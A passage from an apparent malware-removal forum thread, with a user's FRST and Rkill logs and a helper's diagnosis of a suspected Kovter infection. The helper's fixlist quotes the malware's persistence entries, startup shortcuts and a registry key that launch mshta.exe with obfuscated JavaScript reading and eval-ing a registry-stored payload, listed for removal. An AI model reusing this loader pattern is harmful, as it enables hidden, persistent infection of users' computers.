FirewallRules: [{A598F13A-E577-4115-B96F-75DAADDCA32E}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DC82047C-F571-4D27-AE47-8E25AA709F8C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{97F1E280-1F58-4036-8D3B-A4AB0AFDE07C}] => D:\games\steamapps\common\GoatSimulator\Binaries\Win32\GoatGame-Win32-Shipping.exe
FirewallRules: [{4336F6A7-BFB9-4856-AE41-9969159C373D}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{E3E49540-DA16-4843-B75D-9709FB44CEE9}] => D:\games\steamapps\common\Ostrich Island\OstrichIsland.exe
FirewallRules: [{B8000D5F-C3DC-463D-A5DE-01CCDB10685D}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{97499616-5698-43D4-B1F0-BC20871CD2D2}] => C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5BE8033D-6848-4D0F-B23F-F6914ACE3BF2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{304386CC-06C8-4836-B0F5-5678DFED9F8E}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{5B04FA9C-9A62-471F-9BFF-CC5BC42E009D}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{FD172805-0AC1-4E21-B2AC-FE3602F0B65A}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1106F23D-44B2-447D-8DF2-D0A0E5637D22}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{1F93974D-31E5-4699-BE57-C8FF207FA657}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{DB8073E7-FBA9-486A-9BCA-13E3B5BFC64E}] => D:\games\steamapps\common\Dino D-Day\dinodday.exe
FirewallRules: [{AF4FD28D-EECE-42FD-A184-44C5AE397016}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{5DAA871E-4CE0-4FB2-863D-83DC31CA1402}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{82E3BF6E-DB47-4974-A63F-F880E93F9B57}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{63875D53-438A-4457-8643-5BC6ED626346}] => D:\games\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{8A1060E2-36CD-424E-9320-E311EB56BE35}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{2ED9BF3A-D02D-4E47-9BCC-55A8AA11AA26}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{0D06A544-D362-47A6-B2D4-EEE52EF403FB}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{53406011-FA4B-4CBE-97D5-97483A8E0E10}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5B050F35-85EF-46DD-8FF1-33E6847C2206}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{837B45AC-549E-44FE-AD60-EBE4C5528D20}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{98EB06F7-102D-4163-8D4C-A7DA95FF8468}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{3A940815-874F-4B98-8ADD-8914CBE6FDBD}] => C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{06543AA5-9AA0-4C9F-B015-165FFE1C7091}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{41219093-1F3B-4F4C-9F25-1055F0D075CF}] => D:\games\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{B4AB56C1-ACE3-49B3-812B-9B328A5B41A4}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [{F322558A-051F-411A-A513-080FDF36E289}] => D:\games\steamapps\common\Dead by Daylight Alpha Access\DeadByDaylight.exe
FirewallRules: [TCP Query User{F244CCA8-2669-4C85-A321-8B0D07B5380D}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [UDP Query User{207FEB91-B9A5-48B7-86A9-1B8C55CB59E8}D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe] => D:\games\steamapps\common\dead by daylight alpha access\deadbydaylight\binaries\win64\deadbydaylight-win64-shipping.exe
FirewallRules: [{0B28010B-E6EB-4914-9602-14B85B47BD0A}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{0B7D03F1-7CD7-49EA-8100-E067E1CBF775}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{696C9629-827E-4155-955C-C1919A04FE08}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF5ABC92-FB52-495A-ADCD-0366FF705885}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{A86F1E41-8D1F-40A3-A741-326F0AEE90C7}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F972FF74-D54F-4C7F-9214-76ECCCEBA030}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{BD2FD94E-29B1-42E5-A756-691E367F12B9}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{2FEB6DCD-2A28-415D-9764-09C8BE698A12}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{73DC3B85-C79F-4B96-B005-DEC5AC0395C7}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{86505221-0E2B-4301-9D80-F6C2B536D2DF}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{2E9E731D-DD51-49DC-B01C-DFD123595AA3}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{DB98E247-2B23-4A52-86AE-1C2E17CFED31}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{4E3E9E73-8872-46B7-9E5F-05C0D08958D2}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{74E0CFD0-3E9A-425F-80F1-4307641B2819}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{EB73B562-EB9A-4B5D-AFDF-44D2C35FEA1C}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{9EABB9A8-1A38-4776-AF17-79DCB5A4EFBF}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{D173BC0F-9B67-4460-ABEC-8743D7190C0A}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{C46A0005-052C-4055-AA89-D74BA356E1B7}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{27C5C39B-B9A3-4CE5-9C98-2D59F179B915}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{92477BDF-B603-4B87-812A-AD3BEB137A50}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{90462001-694A-485A-B60D-BDA7B73B61EE}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{E007AF0C-9BCA-4113-B752-BF0A93A5BFDC}] => D:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{B8E89F7A-3A7B-43B3-8F79-9676CCEB86F4}D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe] => D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe
FirewallRules: [UDP Query User{DAA4F2A4-5CF8-4C85-BE2B-F0FA488D2B58}D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe] => D:\heroes of the storm\versions\base49278\heroesofthestorm_x64.exe
 
==================== Restore Points =========================
 
09-01-2017 02:16:39 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2995
 
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2995
 
Error: (01/10/2017 09:21:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1997
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1997
 
Error: (01/10/2017 09:21:36 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
 
Error: (01/10/2017 09:21:35 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/10/2017 08:56:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 7.1.2084.9592, time stamp: 0x57605c64
Faulting module name: ntdll.dll, version: 6.1.7601.23572, time stamp: 0x57fd0651
Exception code: 0xc0000005
Fault offset: 0x000000000004da56
Faulting process id: 0x1c24
Faulting application start time: 0x01d26b628b4c0db0
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: c974b600-d755-11e6-a36a-c48e8ffd48f0
 
 
System errors:
=============
Error: (01/10/2017 09:21:39 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:56:24 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:31:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 08:05:54 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 07:40:38 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 07:15:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 06:49:54 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 06:24:37 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 05:59:24 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/10/2017 05:34:08 AM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
 
CodeIntegrity:
===================================
  Date: 2016-10-19 19:50:59.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:46:47.045
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:38:23.578
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:36:25.888
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:27:18.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:26:15.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:25:57.388
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:23:04.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:18:47.014
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:17:43.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700K CPU @ 4.00GHz
Percentage of memory in use: 19%
Total physical RAM: 24514.78 MB
Available physical RAM: 19785.32 MB
Total Virtual: 49027.75 MB
Available Virtual: 42232.91 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:226.7 GB) (Free:78.64 GB) NTFS
Drive d: (DATAPART1) (Fixed) (Total:1863.01 GB) (Free:1644.87 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:3.17 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 1EAA813D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 238.5 GB) (Disk ID: 567A488E)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=226.7 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#14 Bezukhov

Bezukhov

    Bleepin' Jazz Fan!


  • Members
  • 2,618 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Providence, R.I.
  • Local time:01:30 PM

Posted 13 January 2017 - 11:08 AM

Sorry for the wait.

Let's get to work.

I'm kind of curious about the state of your computer. A lot of pointers to a Kovter infection. Here are the symptoms:
  • There is a large amount of network traffic
  • Multiple dllhost.exe processes are running
  • Your computer will act sluggish and programs will take a long time to start up.
  • Pages may be blocked or unreachable while you are browsing the web.
  • Unusual disk activity.
  • CPU utilization is very high
  • Computer is running slowly as a result of these behaviors
So are you still experiencing these, or are they gone after all the tools you ran? I need to know if your still infected, or am I just seeing the remnants of this infection. Either way, there are some steps I want to take.

:step1:

Please download Rkill by Grinler and save it to your desktop.
  • Link 1
  • Link 2
  • Double-click on the Rkill desktop icon to run the tool.
  • If using Vista/Windows7, right-click on it and Run As Administrator.
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
  • If not, delete the file, then download and use the one provided in Link 2.
  • If it does not work, repeat the process and attempt to use one of the remaining links until the tool runs.
  • If the tool does not run from any of the links provided, please let me know.
Do not reboot the computer, you will need to run the application again.

:step2:
  • Press the windows key 2ekn24o.jpg + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it as fixlist.txt. Save it in the same place as FRST64.exe.
    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

CreateRestorePoint:
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) -> "javascript:CKS2wI="jfeb5ohb";TB0=new ActiveXObject("WScript.Shell");u3zJmwRL="gDj1bM";cIhP8=TB0.RegRead("HKCU\\software\\bykshfet\\noce");G7E1Wrjo="YFJO";eval(cIhP8);C2tiiv4T="yYep6F6";"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /C start "" "C:\Users\Owner\AppData\Roaming\8f902\c6d2f.9a4d38"
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Classes\75a29: "C:\Windows\system32\mshta.exe" "javascript:Dv6Ty="kpDGulS";W8f=new ActiveXObject("WScript.Shell");aCVk71="PBz2";D4kLn=W8f.RegRead("HKCU\\software\\bykshfet\\noce");A4M5Vb="HZmwr";eval(D4kLn);WFchl11xY="O5wuSTc";" <===== ATTENTION
2016-06-23 13:01 - 2015-09-25 01:21 - 0016800 _____ () C:\Users\Owner\AppData\Local\Z@!-3b495312-f55f-45c0-9281-2cc59bf18a1b.tmp
2016-06-23 13:01 - 2015-09-25 01:21 - 0015776 _____ () C:\Users\Owner\AppData\Local\Z@S!-c8699736-af5a-499d-bcba-33543711ac5a.tmp
C:\Users\Owner\AppData\Local\c345b
  • Run FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run.
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
So for your next reply please post:

1) Rkill.txt
2) Fixlog.txt
3) A report on how your computer is running.
To err is Human. To blame it on someone else is even more Human.

#15 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 13 January 2017 - 07:01 PM

Rkill.txt

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 01/13/2017 03:51:53 PM in x64 mode.
Windows Version: Windows 7 Professional Service Pack 1
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Checking Windows Service Integrity: 
 
 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual
 
 * TBS [Missing Service]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * No issues found.
 
Program finished at: 01/13/2017 03:51:58 PM
Execution time: 0 hours(s), 0 minute(s), and 5 seconds(s)





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users